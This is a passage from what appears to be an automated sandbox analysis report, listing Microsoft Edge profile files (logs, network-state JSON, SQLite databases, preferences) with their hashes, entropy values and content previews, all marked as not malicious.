                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:13.030 1f8c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/20-02:42:13.031 1f8c Recovering log #3.2024/12/20-02:42:13.033 1f8c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):342
                                                                                                                                                                                                                                                                              Entropy (8bit):5.100952342317442
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfxC3cM+q2PcNwi23oH+Tcwt8a2jMGIFUt8IXfx/JZmw+IXfxJcMVkwOcNwi234:RC3cM+vLZYeb8EFUt86/J/+6JcMV54Zo
                                                                                                                                                                                                                                                                              MD5:CC2504E0B54381C2D6F75AA47B3B71FE
                                                                                                                                                                                                                                                                              SHA1:3605FCD41AABA735CD56CC89501A5E23FAAE43F8
                                                                                                                                                                                                                                                                              SHA-256:05A8F2D5C870ECF303D0A9DD072F32C48A979BF0C09097224946A30BCB6EEBA4
                                                                                                                                                                                                                                                                              SHA-512:41079B23ADE4A9562FEEDBB9334350E27C9219B914612D5965D5F754FFB4C6997BB1212BD717AE9E958F6489D5E551486D3D684DE838C7F1BA83E8E517AE442E
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:13.030 1f8c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/20-02:42:13.031 1f8c Recovering log #3.2024/12/20-02:42:13.033 1f8c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\057ee826-d9e4-4483-91a5-f5f8e71056ba.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\161b491a-c711-4e09-9565-fc7b5945104a.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\484a6b6e-c4f6-46bd-8440-eb0f5301b662.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1618
                                                                                                                                                                                                                                                                              Entropy (8bit):5.302994819295006
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:YcCpWsduCvsafc7leeBRsygCgkhYhbyD0:F2vu22keBxukOhn
                                                                                                                                                                                                                                                                              MD5:90B46E2386024DB7264E402160E5F3B4
                                                                                                                                                                                                                                                                              SHA1:3B2E2F784405DFE32CFE038FAF9F0121224877BB
                                                                                                                                                                                                                                                                              SHA-256:C56B810798569D26A6B771B8DED39C12F26FAC419F019BC878C6B001FBFA501D
                                                                                                                                                                                                                                                                              SHA-512:FA97B24F01A6378FA4A2B3875E9694AC90F0C469E14675FE657DB2F6728C9C9A5D665766F97FE72F533AA89E38C0F0B700C364B85C75867AB6F0083EDD05B186
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218151956","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218812706","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwc

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\9e0507af-53af-4fdd-9eb3-e9b80c92e238.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                              Size (bytes):1768
                                                                                                                                                                                                                                                                              Entropy (8bit):5.299647170768524
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:YcCpfgCzs6tsGTfcKsrleeBkBRsqFCgHLYhbyD0:F2ftTTUkeBkBHTMhn
                                                                                                                                                                                                                                                                              MD5:BAEB1C84F0B40F595253E9524090D8BE
                                                                                                                                                                                                                                                                              SHA1:B2526F7FDF0B0045B4155707B698A2D316421C6A
                                                                                                                                                                                                                                                                              SHA-256:E2CBBD4F5E269436EE97165A8A936DA12823A6BBCB30F525B5F320AEDB6529AC
                                                                                                                                                                                                                                                                              SHA-512:3AB0BBC8C21592B3728F945BA887BA17FBF49746F0A1D0877510AD32A9237C556135D73E218D418FA7D1F7A8F44268A6D36ECB694FC7A9F231AB48BF3F19D69E
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381746136401901","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381746141175431","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379247743871144","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA="

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                              Entropy (8bit):2.7609722424828327
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:tTfdrxrM/SJiuSHkejT9O/q87U57GN5Xcf0L/ZJVb:VfdO/wiuKLjTQ/bKGN5XI0LhJVb
                                                                                                                                                                                                                                                                              MD5:FF9DF87E1C53F3DB1707DBF21579F11E
                                                                                                                                                                                                                                                                              SHA1:ADB4D83A47056989CD8D1A8B3609578D7C75994C
                                                                                                                                                                                                                                                                              SHA-256:93258CE06B2CF1E8EABBCB46AC97ABEFC5A88E991407CA63954F25D4771520F8
                                                                                                                                                                                                                                                                              SHA-512:B6EEC437621AA9D487CB1A9E5D630CD8DC9C8E9C49A082E565F64ABD2389A87EA67FAD7A552855902BBC89E5AB06F2F7ACC21833C9F4D7CD495B1D1D9181786B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1618
                                                                                                                                                                                                                                                                              Entropy (8bit):5.302994819295006
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:YcCpWsduCvsafc7leeBRsygCgkhYhbyD0:F2vu22keBxukOhn
                                                                                                                                                                                                                                                                              MD5:90B46E2386024DB7264E402160E5F3B4
                                                                                                                                                                                                                                                                              SHA1:3B2E2F784405DFE32CFE038FAF9F0121224877BB
                                                                                                                                                                                                                                                                              SHA-256:C56B810798569D26A6B771B8DED39C12F26FAC419F019BC878C6B001FBFA501D
                                                                                                                                                                                                                                                                              SHA-512:FA97B24F01A6378FA4A2B3875E9694AC90F0C469E14675FE657DB2F6728C9C9A5D665766F97FE72F533AA89E38C0F0B700C364B85C75867AB6F0083EDD05B186
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218151956","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218812706","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwc

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF38127.TMP (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1618
                                                                                                                                                                                                                                                                              Entropy (8bit):5.302994819295006
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:YcCpWsduCvsafc7leeBRsygCgkhYhbyD0:F2vu22keBxukOhn
                                                                                                                                                                                                                                                                              MD5:90B46E2386024DB7264E402160E5F3B4
                                                                                                                                                                                                                                                                              SHA1:3B2E2F784405DFE32CFE038FAF9F0121224877BB
                                                                                                                                                                                                                                                                              SHA-256:C56B810798569D26A6B771B8DED39C12F26FAC419F019BC878C6B001FBFA501D
                                                                                                                                                                                                                                                                              SHA-512:FA97B24F01A6378FA4A2B3875E9694AC90F0C469E14675FE657DB2F6728C9C9A5D665766F97FE72F533AA89E38C0F0B700C364B85C75867AB6F0083EDD05B186
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218151956","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218812706","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwc

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):36864
                                                                                                                                                                                                                                                                              Entropy (8bit):1.2784066120502957
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:TFkIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cS2WG:JkIEumQv8m1ccnvStDHiixM1a
                                                                                                                                                                                                                                                                              MD5:7D86AB54AC5D2915327F03EC29C4DFBA
                                                                                                                                                                                                                                                                              SHA1:38B754433EA105E01D3E0FD140F8149713619A4F
                                                                                                                                                                                                                                                                              SHA-256:21A878A3B913CBADA1E7495C4BEEDB5749613223EE84FD15C75C56F51949897E
                                                                                                                                                                                                                                                                              SHA-512:30D10BADF71625944C1D81562D215C7C66FC4EF7F3EB736633A3E0E1DDDE099A24231B6882191AB3F6684CDC1341CECE01F8483E115B433203DD6090F5460740
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF27238.TMP (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF28998.TMP (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\c8f19b8a-ee24-43b2-a08d-ff50294e50de.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\cfb11237-e4aa-4c1b-a1fb-cfd07c252cc6.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                              Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                              MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                              SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                              SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                              SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):9574
                                                                                                                                                                                                                                                                              Entropy (8bit):5.110007633087676
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:st0kdpNspFyaNP9ktCM+68WbV+FedQAq2+PyYJ:st0QNspFtJ0bGkQqM
                                                                                                                                                                                                                                                                              MD5:4AE900B76E77FD4AA8C168C44E82BCE3
                                                                                                                                                                                                                                                                              SHA1:8462F40820135A70F5C8CB9C5E231151489E7097
                                                                                                                                                                                                                                                                              SHA-256:5B60FC3A130DBA4B6495325A5E6233D53D812563151771E023A50DA924468A42
                                                                                                                                                                                                                                                                              SHA-512:16D6EA6ACB44E6D60FC0E92B24D160E35934AD1F57F5AF1F2812E4BABCAB74A8A1F14C64A9F8094A24E568CB32B59D6444DD043F82F67E52519E388AB326BFAE
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379154133170644","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF2b701.TMP (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):9574
                                                                                                                                                                                                                                                                              Entropy (8bit):5.110007633087676
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:st0kdpNspFyaNP9ktCM+68WbV+FedQAq2+PyYJ:st0QNspFtJ0bGkQqM
                                                                                                                                                                                                                                                                              MD5:4AE900B76E77FD4AA8C168C44E82BCE3
